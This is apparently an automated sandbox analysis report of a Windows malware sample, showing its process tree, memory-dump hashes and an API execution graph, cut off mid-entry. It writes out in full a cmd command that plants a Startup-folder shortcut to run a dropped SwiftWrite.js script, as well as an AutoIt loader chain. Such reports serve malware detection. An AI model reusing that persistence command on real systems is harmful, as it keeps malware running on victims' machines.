                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:22
                                                                        Start time:03:05:35
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:23
                                                                        Start time:03:05:42
                                                                        Start date:27/12/2024
                                                                        Path:C:\Users\Public\Guard.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                        Imagebase:0xb50000
                                                                        File size:893'608 bytes
                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 8%, ReversingLabs
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:24
                                                                        Start time:03:05:44
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                        Imagebase:0xa40000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:25
                                                                        Start time:03:05:44
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:26
                                                                        Start time:03:05:54
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                        Imagebase:0x7ff7786c0000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:27
                                                                        Start time:03:05:56
                                                                        Start date:27/12/2024
                                                                        Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                        Imagebase:0x7f0000
                                                                        File size:893'608 bytes
                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 8%, ReversingLabs
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Executed Functions

                                                                          Function 00007FFB4B3E33B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.1447092330.00007FFB4B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffb4b3e0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction ID: ba1c041b66818a4be5791e67ddc5cf0a9afc8cba5eb3fe5d23cb27279392f218
                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction Fuzzy Hash: 0501677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A1DA36E882CB45

                                                                          Executed Functions

                                                                          Function 0000021D24B00FB1 Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.1763630844.0000021D24B00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000021D24B00000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_21d24b00000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                          • Instruction ID: 2fcdd8174b6e461f715adbb2d3d2b95040af39e2c15bf9fed35905f9ea968406
                                                                          • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                          • Instruction Fuzzy Hash: 1490021449544695D41411911C4929C60416398251FD494814C2690145D95D12962552
                                                                          Function 0000021D24B00FB9 Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.1763630844.0000021D24B00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000021D24B00000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_21d24b00000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                          • Instruction ID: 2fcdd8174b6e461f715adbb2d3d2b95040af39e2c15bf9fed35905f9ea968406
                                                                          • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                          • Instruction Fuzzy Hash: 1490021449544695D41411911C4929C60416398251FD494814C2690145D95D12962552
                                                                          Function 0000021D24B00FA9 Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.1763630844.0000021D24B00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000021D24B00000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_21d24b00000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                          • Instruction ID: 2fcdd8174b6e461f715adbb2d3d2b95040af39e2c15bf9fed35905f9ea968406
                                                                          • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                          • Instruction Fuzzy Hash: 1490021449544695D41411911C4929C60416398251FD494814C2690145D95D12962552

                                                                          Executed Functions

                                                                          Function 00007FFB49B538CA Relevance: .2, Instructions: 181COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1754630362.00007FFB49B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffb49b50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dc9a1fd2f9a8fa3aaf7467c9bd7cad759b7cc2f535dde37ae66fae556178d05f
                                                                          • Instruction ID: 478f5ecf29dc4f2567bd04450f92c4080076119362cf965a9676d6ee141186fc
                                                                          • Opcode Fuzzy Hash: dc9a1fd2f9a8fa3aaf7467c9bd7cad759b7cc2f535dde37ae66fae556178d05f
                                                                          • Instruction Fuzzy Hash: 6B5148D2A0EBCF5FE395AE3898A52746BD1DF55224B4801FBD18ECB6C7DC194C458381
                                                                          Function 00007FFB49B547C1 Relevance: .1, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1754630362.00007FFB49B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffb49b50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f3818ae7c1fc748abcb97c2fd0b0590aaed6360dcae91e7cb8bc5490702a2203
                                                                          • Instruction ID: 6de900b85581334a5e6f7f075790784251d79a79c0c7d070e75341aeb4fddabb
                                                                          • Opcode Fuzzy Hash: f3818ae7c1fc748abcb97c2fd0b0590aaed6360dcae91e7cb8bc5490702a2203
                                                                          • Instruction Fuzzy Hash: 11213892E1EADF0FF396FE3C85152B466C3DF952A4B5900BAD94CC3A93DC199C058341
                                                                          Function 00007FFB49A843C5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1753405293.00007FFB49A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49A80000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffb49a80000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction ID: 71033002969539e03c7dbd936468a075a63d14636e2006d39b7f130f1c163dc6
                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction Fuzzy Hash: 1401677111CB0D4FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3651D636E892CB45
                                                                          Function 00007FFB49B50758 Relevance: .0, Instructions: 30COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1754630362.00007FFB49B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffb49b50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 654d3fbfb39df5cd55fc900c6717cce076185a0372007f5747a3e8216b5db2c6
                                                                          • Instruction ID: 6833f92cc04a95e035986ad28f1f9905f3f1102782e2e7b76f6de75184f8e58b
                                                                          • Opcode Fuzzy Hash: 654d3fbfb39df5cd55fc900c6717cce076185a0372007f5747a3e8216b5db2c6
                                                                          • Instruction Fuzzy Hash: 9EE09263A0DD5E1EE7A6BEAC65191F46681DF54275B0401B7D91CC2951DC009C104791

                                                                          Execution Graph

                                                                          Execution Coverage:2.5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:11.5%
                                                                          Total number of Nodes:1561
                                                                          Total number of Limit Nodes:45
                                                                          execution_graph 93352 7ff7adc25328 93377 7ff7adc24cac 93352->93377 93355 7ff7adc25474 93411 7ff7adc257e4 7 API calls 2 library calls 93355->93411 93356 7ff7adc25344 93358 7ff7adc2547e 93356->93358 93359 7ff7adc25362 93356->93359 93412 7ff7adc257e4 7 API calls 2 library calls 93358->93412 93366 7ff7adc253a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 93359->93366 93383 7ff7adc3ae1c 93359->93383 93363 7ff7adc25387 93364 7ff7adc25489 abort 93367 7ff7adc2540d 93366->93367 93408 7ff7adc29204 35 API calls FindHandler 93366->93408 93394 7ff7adc25930 93367->93394 93369 7ff7adc25412 93397 7ff7adc03730 93369->93397 93374 7ff7adc25435 93374->93364 93410 7ff7adc24e90 8 API calls 2 library calls 93374->93410 93376 7ff7adc2544c 93376->93363 93378 7ff7adc24cce __scrt_initialize_crt 93377->93378 93413 7ff7adc265ec 93378->93413 93380 7ff7adc24cd3 __scrt_initialize_crt 93382 7ff7adc24cd7 93380->93382 93421 7ff7adc26620 8 API calls 3 library calls 93380->93421 93382->93355 93382->93356 93385 7ff7adc3ae34 93383->93385 93384 7ff7adc25383 93384->93363 93387 7ff7adc3ada4 93384->93387 93385->93384 93446 7ff7adc25244 93385->93446 93388 7ff7adc3ade0 93387->93388 93389 7ff7adc3adff 93387->93389 93388->93389 93520 7ff7adc010e8 93388->93520 93525 7ff7adc01064 93388->93525 93530 7ff7adc01080 93388->93530 93535 7ff7adc01048 93388->93535 93389->93366 93781 7ff7adc26240 93394->93781 93396 7ff7adc25947 GetStartupInfoW 93396->93369 93398 7ff7adc03743 IsThemeActive 93397->93398 93399 7ff7adc037a3 93397->93399 93783 7ff7adc292d0 93398->93783 93409 7ff7adc25974 GetModuleHandleW 93399->93409 93405 7ff7adc0377d 93795 7ff7adc037b0 93405->93795 93407 7ff7adc03785 SystemParametersInfoW 93407->93399 93408->93367 93409->93374 93410->93376 93411->93358 93412->93364 93414 7ff7adc265f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 93413->93414 93422 7ff7adc27290 93414->93422 93418 7ff7adc2660c 93420 7ff7adc26603 93418->93420 93429 7ff7adc272d8 DeleteCriticalSection 93418->93429 93420->93380 93421->93382 93423 7ff7adc27298 93422->93423 93425 7ff7adc272c9 93423->93425 93427 7ff7adc265ff 93423->93427 93430 7ff7adc27614 93423->93430 93435 7ff7adc272d8 DeleteCriticalSection 93425->93435 93427->93420 93428 7ff7adc27218 8 API calls 3 library calls 93427->93428 93428->93418 93429->93420 93436 7ff7adc27310 93430->93436 93433 7ff7adc2765f InitializeCriticalSectionAndSpinCount 93434 7ff7adc27654 93433->93434 93434->93423 93435->93427 93437 7ff7adc27371 93436->93437 93444 7ff7adc2736c try_get_function 93436->93444 93437->93433 93437->93434 93438 7ff7adc27454 93438->93437 93441 7ff7adc27462 GetProcAddress 93438->93441 93439 7ff7adc273a0 LoadLibraryExW 93440 7ff7adc273c1 GetLastError 93439->93440 93439->93444 93440->93444 93442 7ff7adc27473 93441->93442 93442->93437 93443 7ff7adc27439 FreeLibrary 93443->93444 93444->93437 93444->93438 93444->93439 93444->93443 93445 7ff7adc273fb LoadLibraryExW 93444->93445 93445->93444 93447 7ff7adc25254 93446->93447 93463 7ff7adc32584 93447->93463 93449 7ff7adc25260 93469 7ff7adc24cf8 93449->93469 93451 7ff7adc252ce 93462 7ff7adc252ea 93451->93462 93500 7ff7adc257e4 7 API calls 2 library calls 93451->93500 93453 7ff7adc25279 _RTC_Initialize 93453->93451 93474 7ff7adc24f0c 93453->93474 93454 7ff7adc252fa __scrt_initialize_default_local_stdio_options 93454->93385 93456 7ff7adc2528e 93477 7ff7adc3a09c 93456->93477 93460 7ff7adc252a3 93461 7ff7adc3aebc 35 API calls 93460->93461 93461->93451 93462->93385 93464 7ff7adc32595 93463->93464 93465 7ff7adc3259d 93464->93465 93501 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 93464->93501 93465->93449 93467 7ff7adc325ac 93502 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 93467->93502 93470 7ff7adc24d0d 93469->93470 93473 7ff7adc24d16 __scrt_initialize_onexit_tables 93469->93473 93470->93473 93503 7ff7adc257e4 7 API calls 2 library calls 93470->93503 93472 7ff7adc24dcf 93473->93453 93504 7ff7adc24ebc 93474->93504 93476 7ff7adc24f15 93476->93456 93478 7ff7adc3a0ba 93477->93478 93479 7ff7adc3a0d0 GetModuleFileNameW 93477->93479 93509 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 93478->93509 93482 7ff7adc3a0fd 93479->93482 93481 7ff7adc3a0bf 93510 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 93481->93510 93511 7ff7adc3a038 15 API calls 2 library calls 93482->93511 93484 7ff7adc2529a 93484->93451 93499 7ff7adc25ac4 InitializeSListHead 93484->93499 93486 7ff7adc3a13d 93487 7ff7adc3a145 93486->93487 93489 7ff7adc3a156 93486->93489 93512 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 93487->93512 93491 7ff7adc3a1bb 93489->93491 93492 7ff7adc3a1a2 93489->93492 93497 7ff7adc3a14a 93489->93497 93490 7ff7adc3b3c0 __free_lconv_num 15 API calls 93490->93484 93495 7ff7adc3b3c0 __free_lconv_num 15 API calls 93491->93495 93513 7ff7adc3b3c0 93492->93513 93494 7ff7adc3a1ab 93496 7ff7adc3b3c0 __free_lconv_num 15 API calls 93494->93496 93495->93497 93498 7ff7adc3a1b7 93496->93498 93497->93490 93498->93484 93500->93454 93501->93467 93502->93465 93503->93472 93505 7ff7adc24eeb 93504->93505 93507 7ff7adc24ee1 _onexit 93504->93507 93508 7ff7adc3ab08 34 API calls _onexit 93505->93508 93507->93476 93508->93507 93509->93481 93510->93484 93511->93486 93512->93497 93514 7ff7adc3b3c5 RtlFreeHeap 93513->93514 93518 7ff7adc3b3f5 __free_lconv_num 93513->93518 93515 7ff7adc3b3e0 93514->93515 93514->93518 93519 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 93515->93519 93517 7ff7adc3b3e5 GetLastError 93517->93518 93518->93494 93519->93517 93540 7ff7adc21d80 93520->93540 93523 7ff7adc24ebc _onexit 34 API calls 93524 7ff7adc24f15 93523->93524 93524->93388 93596 7ff7adc07ec0 93525->93596 93527 7ff7adc0106d 93528 7ff7adc24ebc _onexit 34 API calls 93527->93528 93529 7ff7adc24f15 93528->93529 93529->93388 93680 7ff7adc07920 93530->93680 93532 7ff7adc0109e 93533 7ff7adc24ebc _onexit 34 API calls 93532->93533 93534 7ff7adc24f15 93533->93534 93534->93388 93763 7ff7adc07718 93535->93763 93538 7ff7adc24ebc _onexit 34 API calls 93539 7ff7adc24f15 93538->93539 93539->93388 93562 7ff7adc09640 93540->93562 93542 7ff7adc21db2 GetVersionExW 93565 7ff7adc07cf4 93542->93565 93544 7ff7adc0dda4 4 API calls 93545 7ff7adc21dfc 93544->93545 93545->93544 93546 7ff7adc21e87 93545->93546 93575 7ff7adc0dda4 93546->93575 93548 7ff7adc69645 93550 7ff7adc6964f 93548->93550 93549 7ff7adc21f3c GetCurrentProcess IsWow64Process 93551 7ff7adc21f7e memcpy_s 93549->93551 93579 7ff7adc732f4 LoadLibraryA GetProcAddress 93550->93579 93551->93550 93553 7ff7adc21f86 GetSystemInfo 93551->93553 93552 7ff7adc21ea4 93552->93548 93552->93549 93555 7ff7adc010f1 93553->93555 93555->93523 93556 7ff7adc696b1 93557 7ff7adc696d7 GetSystemInfo 93556->93557 93558 7ff7adc696b5 93556->93558 93559 7ff7adc696bf 93557->93559 93580 7ff7adc732f4 LoadLibraryA GetProcAddress 93558->93580 93559->93555 93561 7ff7adc696f0 FreeLibrary 93559->93561 93561->93555 93581 7ff7adc24c68 93562->93581 93564 7ff7adc09663 93564->93542 93566 7ff7adc4d2c8 93565->93566 93567 7ff7adc07d0d 93565->93567 93568 7ff7adc0dda4 4 API calls 93566->93568 93570 7ff7adc07d24 93567->93570 93573 7ff7adc07d51 93567->93573 93569 7ff7adc4d2d3 93568->93569 93590 7ff7adc07e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93570->93590 93572 7ff7adc07d2f memcpy_s 93572->93545 93573->93569 93574 7ff7adc24c68 4 API calls 93573->93574 93574->93572 93576 7ff7adc0ddc7 memcpy_s 93575->93576 93577 7ff7adc0dda9 93575->93577 93576->93552 93577->93576 93591 7ff7adc0a7c0 93577->93591 93579->93556 93580->93559 93584 7ff7adc24c2c 93581->93584 93582 7ff7adc24c50 93582->93564 93584->93581 93584->93582 93587 7ff7adc2925c EnterCriticalSection LeaveCriticalSection fread_s 93584->93587 93588 7ff7adc25600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 93584->93588 93589 7ff7adc25620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 93584->93589 93587->93584 93589->93584 93590->93572 93593 7ff7adc0a7ed 93591->93593 93595 7ff7adc0a7dd memcpy_s 93591->93595 93592 7ff7adc4e7da 93593->93592 93594 7ff7adc24c68 4 API calls 93593->93594 93594->93595 93595->93576 93632 7ff7adc082b4 93596->93632 93599 7ff7adc082b4 4 API calls 93600 7ff7adc07f3a 93599->93600 93601 7ff7adc09640 4 API calls 93600->93601 93602 7ff7adc07f46 93601->93602 93603 7ff7adc07cf4 4 API calls 93602->93603 93604 7ff7adc07f59 93603->93604 93639 7ff7adc22d5c 6 API calls 93604->93639 93606 7ff7adc07fa5 93607 7ff7adc09640 4 API calls 93606->93607 93608 7ff7adc07fb1 93607->93608 93609 7ff7adc09640 4 API calls 93608->93609 93610 7ff7adc07fbd 93609->93610 93611 7ff7adc09640 4 API calls 93610->93611 93612 7ff7adc07fc9 93611->93612 93613 7ff7adc09640 4 API calls 93612->93613 93614 7ff7adc0800f 93613->93614 93615 7ff7adc09640 4 API calls 93614->93615 93616 7ff7adc080f7 93615->93616 93640 7ff7adc1ef88 93616->93640 93618 7ff7adc08103 93647 7ff7adc1eec8 93618->93647 93620 7ff7adc0812f 93621 7ff7adc09640 4 API calls 93620->93621 93622 7ff7adc0813b 93621->93622 93658 7ff7adc16d40 93622->93658 93626 7ff7adc081ac 93627 7ff7adc081be GetStdHandle 93626->93627 93628 7ff7adc08220 OleInitialize 93627->93628 93629 7ff7adc4d350 93627->93629 93628->93527 93675 7ff7adc7ffc8 CreateThread 93629->93675 93631 7ff7adc4d367 CloseHandle 93633 7ff7adc09640 4 API calls 93632->93633 93634 7ff7adc082c6 93633->93634 93635 7ff7adc09640 4 API calls 93634->93635 93636 7ff7adc082cf 93635->93636 93637 7ff7adc09640 4 API calls 93636->93637 93638 7ff7adc07f2e 93637->93638 93638->93599 93639->93606 93641 7ff7adc09640 4 API calls 93640->93641 93642 7ff7adc1efa3 93641->93642 93643 7ff7adc09640 4 API calls 93642->93643 93644 7ff7adc1efac 93643->93644 93645 7ff7adc09640 4 API calls 93644->93645 93646 7ff7adc1f02e 93645->93646 93646->93618 93648 7ff7adc1eede 93647->93648 93649 7ff7adc09640 4 API calls 93648->93649 93650 7ff7adc1eeea 93649->93650 93651 7ff7adc09640 4 API calls 93650->93651 93652 7ff7adc1eef6 93651->93652 93653 7ff7adc09640 4 API calls 93652->93653 93654 7ff7adc1ef02 93653->93654 93655 7ff7adc09640 4 API calls 93654->93655 93656 7ff7adc1ef0e 93655->93656 93657 7ff7adc1ef68 RegisterWindowMessageW 93656->93657 93657->93620 93659 7ff7adc16db9 93658->93659 93665 7ff7adc16d80 93658->93665 93676 7ff7adc25114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93659->93676 93667 7ff7adc0816b 93665->93667 93677 7ff7adc25114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93665->93677 93668 7ff7adc239a8 93667->93668 93669 7ff7adc239cc 93668->93669 93670 7ff7adc6a502 93668->93670 93669->93626 93678 7ff7adc0ee20 5 API calls Concurrency::wait 93670->93678 93672 7ff7adc6a50e 93679 7ff7adc0ee20 5 API calls Concurrency::wait 93672->93679 93674 7ff7adc6a52d 93675->93631 93678->93672 93679->93674 93681 7ff7adc07948 wcsftime 93680->93681 93682 7ff7adc09640 4 API calls 93681->93682 93683 7ff7adc07a02 93682->93683 93710 7ff7adc05680 93683->93710 93685 7ff7adc07a0c 93717 7ff7adc23a38 93685->93717 93689 7ff7adc07a2c 93733 7ff7adc04680 93689->93733 93691 7ff7adc07a3d 93692 7ff7adc09640 4 API calls 93691->93692 93693 7ff7adc07a47 93692->93693 93737 7ff7adc0a854 93693->93737 93696 7ff7adc4d05c RegQueryValueExW 93697 7ff7adc4d08f 93696->93697 93698 7ff7adc4d131 RegCloseKey 93696->93698 93699 7ff7adc24c68 4 API calls 93697->93699 93700 7ff7adc07a83 Concurrency::wait 93698->93700 93706 7ff7adc4d147 wcscat Concurrency::wait 93698->93706 93701 7ff7adc4d0b2 93699->93701 93700->93532 93703 7ff7adc4d0bf RegQueryValueExW 93701->93703 93702 7ff7adc09d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93702->93706 93704 7ff7adc4d0f3 93703->93704 93707 7ff7adc4d112 93703->93707 93705 7ff7adc07cf4 4 API calls 93704->93705 93705->93707 93706->93700 93706->93702 93709 7ff7adc04680 4 API calls 93706->93709 93741 7ff7adc0ec00 93706->93741 93707->93698 93709->93706 93746 7ff7adc48f90 93710->93746 93713 7ff7adc0ec00 4 API calls 93714 7ff7adc056b4 93713->93714 93748 7ff7adc056d4 93714->93748 93716 7ff7adc056c1 Concurrency::wait 93716->93685 93718 7ff7adc48f90 wcsftime 93717->93718 93719 7ff7adc23a44 GetFullPathNameW 93718->93719 93720 7ff7adc23a74 93719->93720 93721 7ff7adc07cf4 4 API calls 93720->93721 93722 7ff7adc07a1b 93721->93722 93723 7ff7adc071f8 93722->93723 93724 7ff7adc0721c 93723->93724 93728 7ff7adc4cd0c 93723->93728 93725 7ff7adc07274 93724->93725 93726 7ff7adc4cd66 memcpy_s 93724->93726 93758 7ff7adc0b960 93725->93758 93731 7ff7adc24c68 4 API calls 93726->93731 93729 7ff7adc24c68 4 API calls 93728->93729 93729->93726 93730 7ff7adc07283 memcpy_s 93730->93689 93732 7ff7adc4cdda memcpy_s 93731->93732 93734 7ff7adc0469f 93733->93734 93735 7ff7adc046c8 memcpy_s 93733->93735 93736 7ff7adc24c68 4 API calls 93734->93736 93735->93691 93736->93735 93738 7ff7adc07a51 RegOpenKeyExW 93737->93738 93739 7ff7adc0a87a 93737->93739 93738->93696 93738->93700 93740 7ff7adc24c68 4 API calls 93739->93740 93740->93738 93742 7ff7adc0ec1d 93741->93742 93743 7ff7adc5a5a2 93742->93743 93744 7ff7adc24c68 4 API calls 93742->93744 93745 7ff7adc0ec55 memcpy_s 93744->93745 93745->93706 93747 7ff7adc0568c GetModuleFileNameW 93746->93747 93747->93713 93749 7ff7adc48f90 wcsftime 93748->93749 93750 7ff7adc056e9 GetFullPathNameW 93749->93750 93751 7ff7adc05712 93750->93751 93752 7ff7adc4c03a 93750->93752 93754 7ff7adc07cf4 4 API calls 93751->93754 93753 7ff7adc0a854 4 API calls 93752->93753 93755 7ff7adc0571c 93753->93755 93754->93755 93755->93755 93756 7ff7adc0dda4 4 API calls 93755->93756 93757 7ff7adc05785 93756->93757 93757->93716 93759 7ff7adc0b981 93758->93759 93762 7ff7adc0b976 memcpy_s 93758->93762 93760 7ff7adc4ef2a 93759->93760 93761 7ff7adc24c68 4 API calls 93759->93761 93761->93762 93762->93730 93764 7ff7adc09640 4 API calls 93763->93764 93765 7ff7adc0778f 93764->93765 93770 7ff7adc06f24 93765->93770 93767 7ff7adc01051 93767->93538 93768 7ff7adc0782c 93768->93767 93773 7ff7adc07410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93768->93773 93774 7ff7adc06f60 93770->93774 93773->93768 93775 7ff7adc06f85 93774->93775 93776 7ff7adc06f52 93774->93776 93775->93776 93777 7ff7adc06f93 RegOpenKeyExW 93775->93777 93776->93768 93777->93776 93778 7ff7adc06faf RegQueryValueExW 93777->93778 93779 7ff7adc06ff5 RegCloseKey 93778->93779 93780 7ff7adc06fdd 93778->93780 93779->93776 93780->93779 93782 7ff7adc26220 93781->93782 93782->93396 93782->93782 93841 7ff7adc3b9bc EnterCriticalSection 93783->93841 93785 7ff7adc292e4 93786 7ff7adc3ba10 _isindst LeaveCriticalSection 93785->93786 93787 7ff7adc0376e 93786->93787 93788 7ff7adc29334 93787->93788 93789 7ff7adc2933d 93788->93789 93790 7ff7adc03778 93788->93790 93842 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 93789->93842 93794 7ff7adc036e8 SystemParametersInfoW SystemParametersInfoW 93790->93794 93792 7ff7adc29342 93843 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 93792->93843 93794->93405 93796 7ff7adc037cd wcsftime 93795->93796 93797 7ff7adc09640 4 API calls 93796->93797 93798 7ff7adc037dd GetCurrentDirectoryW 93797->93798 93844 7ff7adc057a0 93798->93844 93800 7ff7adc03807 IsDebuggerPresent 93801 7ff7adc03815 93800->93801 93802 7ff7adc4b872 MessageBoxA 93800->93802 93803 7ff7adc4b894 93801->93803 93804 7ff7adc03839 93801->93804 93802->93803 93954 7ff7adc0e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93803->93954 93918 7ff7adc03f04 93804->93918 93808 7ff7adc03860 GetFullPathNameW 93809 